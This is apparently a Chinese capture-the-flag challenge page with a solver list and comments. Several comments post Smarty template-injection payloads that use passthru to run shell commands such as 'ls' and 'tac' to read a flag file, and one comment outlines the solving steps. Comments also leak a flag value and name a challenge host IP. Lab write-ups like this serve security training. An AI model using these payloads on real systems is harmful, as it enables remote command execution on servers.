评分(13)
解题动态
igrazee 攻破了该题 3小时前
zzuer 攻破了该题 17小时前
out不慢 攻破了该题 1天前
邪恶的番茄 攻破了该题 1天前
hbynb 攻破了该题 2天前
zrc2682 攻破了该题 3天前
南京交通第一深情徐立超 攻破了该题 4天前
zhy2006 攻破了该题 5天前
color111111 攻破了该题 5天前
18934929166 攻破了该题 5天前
liang123456 攻破了该题 6天前
ycwh 攻破了该题 7天前
Silence秋 攻破了该题 8天前
dragonX 攻破了该题 9天前
Blmn 攻破了该题 9天前
caocao 攻破了该题 9天前
tutuyeye 攻破了该题 10天前
zhenmingshui 攻破了该题 11天前
ma272118565 攻破了该题 11天前
评论
对对对对对对对对 11天前
举报
?key={{passthru(%27tac%20/_4427%27)}}
anony 4月前
举报
flag{********}
人闲桂花落 5月前
举报
tac命令读取也可
docker0w 1年前
举报
1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获
bx33661 1年前
举报
?key={passthru("tac%20/_28710")}
yun20231227 1年前
举报
?key={{passthru('ls /')}}
xinkuang 1年前
举报
http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}
Daniel2023 1年前
举报
flag{0e54d64e616af92957ddbb6c6ea37c5f}
一路奔腾 1年前
举报
?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120
EtHat 2年前
举报
index.php?a={passthru("tac /_4060")}
FUCK123 1年前
举报
fnmdp